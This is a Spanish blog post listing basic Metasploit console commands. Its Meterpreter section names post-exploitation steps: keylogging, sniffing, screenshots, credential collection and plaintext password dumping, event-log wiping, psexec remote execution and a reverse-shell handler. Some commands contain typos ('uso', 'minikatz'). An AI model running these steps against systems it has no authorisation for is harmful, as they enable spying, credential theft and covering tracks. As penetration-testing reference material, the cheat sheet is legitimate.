EninSoft - recursos para programadores web > Eninsoft > framework > Comandos básicos para la consola de metasploit

Comandos básicos para la consola de metasploit

mayo 16, 2019
Categoría: framework kali linux redes seguridad

Importante: Esta información es para uso lúdico personal. En ningún caso se pretende dar conocimientos, consejos, formaciones, herramientas, ni soluciones técnicas de ámbito comercial ni profesional. Simplemente es información que se ha redactado en finalidad de recordatorio de ciertos proyectos realizados. Si usted no está seguro de la fiabilidad de la información, no cumple con sus expectativas o no es de su agrado, le ruego que abandone este sitio web. Para ver todas las exclusiones garantía y de responsabilidad acceda a la sección Aviso Legal.

Metasploit es un framework para la explotación de vulnerabilidades que pertenece a la empresa Rapid7. Entre sus variantes de funcionamiento, aquí se detallan los comandos básicos para su modo consola.

Actualizar Metasploit

msfupgrade

Entrar en modo consola

msfconsole

Ayuda

help

Buscar playload, exploit, auxiliars, …

search name

Buscar por CVE

search CVE:2014-3245

Información de un playload, exploit, auxiliar, …

info name

Uso de un playload, exploit, auxiliar, …

uso name

Mostrar opciones del playload, exploit, auxiliar, …

show options

Volver atras

back

Asignar una variable, por ejemplo, RHOST

set RHOST 192.168.1.1

Asignar una variable global, por ejemplo, RHOST

setg RHOST 192.168.1.1

Estado de la base de datos

db_status

Uso de la base de datos para guardar información

msfdb init
db_connect -y /usr/share/metasploit-framework/config/database.yml

Ver la tabla de hosts

hosts

Ver la tabla de puertos

services

Ver la tabla de credenciales

creds

Buscar un elemento en una tabla, por ejemplo, linux en hosts.

hosts -L linux

Borrar un elemento de una tabla, por ejemplo, en hosts

hosts -d 3

Importar un escaneo de nmap en formato xml

db_import /root/nmap.xml

Lanzar un escaneo con nmap dentro de metasploit

db_nmap -sT -p- -sV -O 192.168.1.1

Meterpreter

> background  # enviar sesión en background.
> migrate PID  # abrir la sesión PID.
> search -f *.pdf  # listar todos los archivos pdf.
> search -d c:\\temp  # buscar en la destinación especificada.

# sniffer
> sniffer_interfaces
> sniffer_start id_interfaces
> sniffer_stats
> sniffer_stop
> sniffer_dump

# keylogger
> keyscan_start
> keyscan_dump
> keyscan_stop
> screenshot

# get information
> run scraper
> run winenum
> run credcollect

# borrar logs
run event_manager -i
run event_manager -c  # borra todos los logs.
clearev  # borra todos los logs.

Contraseñas en texto plano

load minikatz

Ejecutar comandos pc remoto con psexec.

use  exploit/windows/smb/psexec  # rhost, smbpass, smbuser

Abrir socket para conexión reversa

use exploit/multi/handler
set LPORT 4444
set LHOST 192.168.2.100
exploit